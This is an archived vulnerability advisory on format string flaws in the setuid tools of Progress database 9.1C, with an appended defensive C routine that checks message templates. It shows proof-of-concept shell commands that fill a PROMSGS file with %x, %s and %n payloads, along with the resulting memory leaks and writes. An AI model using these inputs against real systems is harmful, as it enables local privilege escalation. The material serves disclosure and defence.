Progress database (format string overflow)



5th Nov 2001 [SBWID-4840]
COMMAND

	Progress database (format string overflow)

SYSTEMS AFFECTED

	PROGRESS Version 9.1C

PROBLEM

	KF <dotslash@snosoft.com> found the following:
	

	Well once again I have found yet another Progress  database  issue.  The
	PROMSGS has been looked at one time already  for  buffer  overflows.  It
	was supposed to be fixed. I was poking around at it  today  and  noticed
	these format string issues... PROGRESS Version 9.1C as  of  Thu  Jun  7
	10:03:59 EDT 2001
	

	First test with a malformed PROMSGS.
	

	 [elguapo@linux bin]$ echo blah > file

	 [elguapo@linux bin]$ export PROMSGS=./file

	 [elguapo@linux bin]$ ./_probuild

	 

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 290

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 96

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 6063

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 24

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 912

	

	

	Test  to  make  sure  they  fixed  my  original  hole  with  the  buffer
	overflows. (looks fine)
	

	 [elguapo@linux bin]$ echo `perl -e 'print "A" x 20000'` > file

	 [elguapo@linux bin]$ ./_probuild

	 

	Error formatting messaage 96.  Message file is corrupt.

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 6063

	Error formatting messaage 24.  Message file is corrupt.

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 912

	

	

	Well if you use a format string instead of  an  A  we  get  much  better
	results.
	

	 [elguapo@linux bin]$ echo `perl -e 'print "%x" x 9000'` > file

	 [elguapo@linux bin]$ ./_probuild

	 

	Error formatting messaage 96.  Message file is corrupt.

	0x00x00x3e0x83c63500xbffff81c0x10x00x8062d350x3cc6140x00xbffffd4f0x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7340x80618450x00x83e3ec00x83e3ec00x83c7b200x900x83c63500xbffff81c0x10xbffff66c0x00x401e5f2c0x10000x401e44a00xbffff6680x4013f2bd0x10000x401e5f2c0xbffff7180x4013f2aa%

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 6063

	Error formatting messaage 24.  Message file is corrupt.

	0x837a70e0x83c63500x83e970c0x00xbffff6240x807784b0x40x83e95b00x83c63500xbffff81c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5440x83e3ec00xbffff6c40x83166430xbffff5440xbffff6040xc00xbffff5440x83e3ec00xbffff5440x83e3ec00x83c63500x00x83e3ec00x50x2000x8a0xbffff5ad0x920xbffff56d%

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 912

	

	

	 [elguapo@linux bin]$ echo `perl -e 'print "%s" x 9000'` > file

	 [elguapo@linux bin]$ ./_probuild

	 

	Error formatting messaage 96.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	Error formatting messaage 49.  Message file is corrupt.

	rcurctr overflow reading promsgs file.

	(note the overflow msg)

	

	

	 [elguapo@linux bin]$ echo `perl -e 'print "%n" x 9000'` > file

	 [elguapo@linux bin]$ ./_probuild

	 

	Error formatting messaage 96.  Message file is corrupt.

	0(tty)0(tty)6225424-20201(tty)0(tty)11573-148280(tty)-68928197281972819728197281972819728197-2011-225262130(tty)16064160643152014425424-20201(tty)-24520(tty)24364409617568-2456-3395409624364-2280-3414%

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 6063

	Error formatting messaage 24.  Message file is corrupt.

	-2277025424-268680(tty)-2524307954-2721625424-20200(tty)82240(tty)128578246822421057139041978977-274816064-236426179-2748-2556192-274816064-274816064254240(tty)160645512138-2643146-2707%

	errno=0 reading promsgs file, it may have been deleted.

	Unable to format message number 912

	

	ALL suids in the dlc/bin dir are affected
	

	

	

SOLUTION

	Nothing yet.
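
	Added example (not part of the original advisory and not Progress code): one way a program that loads printf-style message templates from a replaceable file such as PROMSGS can refuse any entry whose conversions differ from its built-in default, which rejects the %x, %s and %n test files shown above. The function names and the sample messages are assumptions made for illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Progress code. Writes a template's ordered conversions to out
 * ("%s: errno=%ld" -> "sld"); -1 on anything off the allow-list (%n, '*', '$', %p). */
static int fmt_signature(const char *fmt, char *out, size_t outsz) {
    size_t n = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') continue;
        if (*++p == '%') continue;                 /* "%%" is a literal */
        while (*p && strchr("-+ #0", *p)) p++;     /* flags */
        while (*p >= '0' && *p <= '9') p++;        /* width */
        if (*p == '.') { p++; while (*p >= '0' && *p <= '9') p++; } /* precision */
        while (*p == 'h' || *p == 'l') {           /* length modifier is part of the type */
            if (n + 1 >= outsz) return -1;
            out[n++] = *p++;
        }
        if (*p == '\0' || !strchr("diouxXcs", *p)) return -1;
        if (n + 1 >= outsz) return -1;
        out[n++] = *p;
    }
    out[n] = '\0';
    return 0;
}

/* 1 only if the untrusted template consumes exactly what the trusted built-in does. */
int template_is_safe(const char *untrusted, const char *builtin) {
    char a[64], b[64];
    return fmt_signature(untrusted, a, sizeof a) == 0 &&
           fmt_signature(builtin, b, sizeof b) == 0 && strcmp(a, b) == 0;
}

/* Format with the catalog entry when it passes, otherwise with the built-in text. */
int safe_format(char *dst, size_t dstsz, const char *untrusted, const char *builtin, ...) {
    va_list ap;
    va_start(ap, builtin);
    int r = vsnprintf(dst, dstsz, template_is_safe(untrusted, builtin) ? untrusted : builtin, ap);
    va_end(ap);
    return r;
}

int main(void) {  /* constructed entries: a reworded message, then a hostile one */
    char buf[128];
    safe_format(buf, sizeof buf, "cannot read %s (code %d)", "read %s failed: %d", "promsgs", 2);
    puts(buf);
    safe_format(buf, sizeof buf, "%x%x%x%x%n", "read %s failed: %d", "promsgs", 2);
    puts(buf);
    return 0;
}
```

	The check is deliberately strict: an entry with fewer or reordered conversions is also replaced by the built-in text.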

